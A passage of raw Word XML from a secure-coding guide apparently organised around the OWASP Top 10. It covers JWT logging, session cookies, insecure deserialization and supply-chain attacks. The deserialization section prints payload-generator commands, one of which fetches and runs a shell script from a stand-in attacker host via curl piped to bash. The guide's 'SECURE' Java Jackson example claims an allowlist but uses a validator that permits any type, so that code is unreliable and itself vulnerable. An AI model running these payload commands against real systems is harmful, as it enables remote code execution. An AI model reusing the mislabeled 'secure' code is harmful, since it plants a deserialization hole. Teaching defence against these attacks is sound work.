      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Signature verification errors revealing both expected and actual signature values in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JWT information disclosure via error messages (.NET examples)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// VULNERABLE: Logging full token on expiry (reveals token to log readers)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">catch (TokenExpiredException) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    LogTo.Error("Token has expired: {Token}", token);  // logs the full JWT!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</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VULNERABLE: Error message reveals signature mismatch details</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">throw new SignatureVerificationException(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    string.Format("Invalid signature. Expected {0} got {1}",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    decodedCrypto, decodedSignature));  // reveals crypto values!</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SECURE: Log only non-sensitive token metadata</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">catch (TokenExpiredException) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    LogTo.Warn("Token expired for user: {UserId}", claims.UserId);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Enforce strong password policies with minimum length (12+ characters) and breach-checking (HaveIBeenPwned API)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement multi-factor authentication (MFA) for all accounts, especially admin accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate-limit and lock accounts after repeated failed login attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use secure, random session tokens (minimum 128 bits of entropy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Invalidate sessions on logout, password change, and after a reasonable idle timeout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Transmit session tokens only over HTTPS with Secure and HttpOnly cookie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Secure session configuration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// SECURE session cookie configuration (Express.js)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">app.use(session({</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  secret: process.env.SESSION_SECRET,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  resave: false,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  saveUninitialized: false,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  cookie: {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    secure: true,      // HTTPS only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    httpOnly: true,    // not accessible via JavaScript</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    sameSite: 'strict',// CSRF protection</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    maxAge: 30 * 60 * 1000  // 30-minute timeout</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}));</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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A07 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Use bcrypt/Argon2id for passwords; never MD5 or SHA-1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Implement MFA, especially for privileged accounts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Rate-limit login endpoints and implement account lockout</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Never log tokens or credentials in error messages</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Set Secure, HttpOnly, and SameSite flags on session cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A08:2021 — Software and Data Integrity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Code Execution / Supply Chain Attack</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This category covers failures to protect against integrity violations in software updates, CI/CD pipelines, and critical data. The most severe risk is insecure deserialization, which can lead to Remote Code Execution (RCE). It also covers supply chain attacks where malicious code is injected into a software distribution pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Serialization converts an object into a storable/transmittable format (JSON, XML, binary). Deserialization is the reverse. When an application deserialises untrusted data from a user, an attacker can craft a malicious payload that, when deserialised, executes arbitrary code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Deserialization RCE payloads by language</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Deserialization = Remote Code Execution</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Tools for generating malicious payloads:</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Java: ysoserial — generates gadget chain payloads for Java deserialization</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">java -jar ysoserial.jar CommonsCollections1 'curl http://attacker.com/shell.sh | bash'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Reference: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet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.NET: ysoserial.net</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c 'cmd /c whoami'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Reference: https://github.com/pwntester/ysoserial.net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PHP: PHPGGC — PHP generic gadget chains</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">phpggc Laravel/RCE1 system 'id' | base64</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Reference: https://github.com/ambionics/phpggc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply chain attacks compromise software before it reaches the end user — by injecting malicious code into build tools, package registries, or update mechanisms. High-profile examples include the SolarWinds attack and the XZ Utils backdoor.</w:t>
      </w:r>
    </w:p>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Avoid deserialising data from untrusted sources entirely where possible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If deserialisation is unavoidable, use integrity checks (digital signatures) before deserialising</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use JSON with schema validation instead of binary serialisation formats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement integrity checks on software packages (checksum verification, code signing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify CI/CD pipeline integrity; use pinned dependency versions with SRI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Safer deserialisation patterns</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// SECURE: Type-safe deserialisation with explicit allowlist (Java Jackson)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ObjectMapper mapper = new ObjectMapper();</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">mapper.activateDefaultTyping(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    LaissezFaireSubTypeValidator.instance,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    ObjectMapper.DefaultTyping.NON_FINAL,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    JsonTypeInfo.As.PROPERTY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Better: avoid polymorphic deserialization entirely</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SECURE: PHP — use JSON instead of unserialize()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$data = json_decode($_POST['data'], true);  // safe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
